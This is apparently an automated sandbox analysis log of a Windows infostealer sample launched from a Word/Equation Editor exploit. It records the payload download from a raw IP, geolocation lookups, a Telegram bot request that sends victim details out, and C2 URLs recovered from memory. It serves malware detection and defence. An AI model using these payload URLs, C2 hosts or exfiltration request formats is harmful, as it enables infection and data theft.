00 04 02 23 00 00 00 00 d0 12 63 c1 7d 0d 00 00 04 02 20 0f 27 00 00 17 17 73 1c 00 00 0a 7d 0e 00 00 04 02 17 17 17 73 1c 00 00 0a 7d 0f 00 00 04 02 16 7d 10 00 00 04 02 16 7d 11 00 00 04 02 28 15 00 00 0a 00 00 03 28 1d 00
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20and%20Time:%209/27/2024%20/%2010:16:15%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20609290%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49173 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global trafficHTTP traffic detected: GET /txt/HgCppsoKmxQq.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2467304B-9A7F-4216-A178-345DF60D02BC}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20and%20Time:%209/27/2024%20/%2010:16:15%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20609290%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /txt/HgCppsoKmxQq.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 07:25:40 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.383078527.00000000002D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.383201670.00000000002D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.383161486.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/HgCppsoKmxQq.exe
                Source: EQNEDT32.EXE, 00000002.00000003.383078527.00000000002D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.383201670.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/HgCppsoKmxQq.exeflC:
                Source: EQNEDT32.EXE, 00000002.00000002.383161486.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/HgCppsoKmxQq.exej
                Source: EQNEDT32.EXE, 00000002.00000002.383161486.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/HgCppsoKmxQq.exeqqC:
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025B4000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025B4000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002512000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: ncfplgpeter20306.exe, 00000009.00000002.908145978.0000000005C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.908145978.0000000005C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000253A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: ncfplgpeter20306.exe, 00000005.00000002.393368543.0000000002187000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20a
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
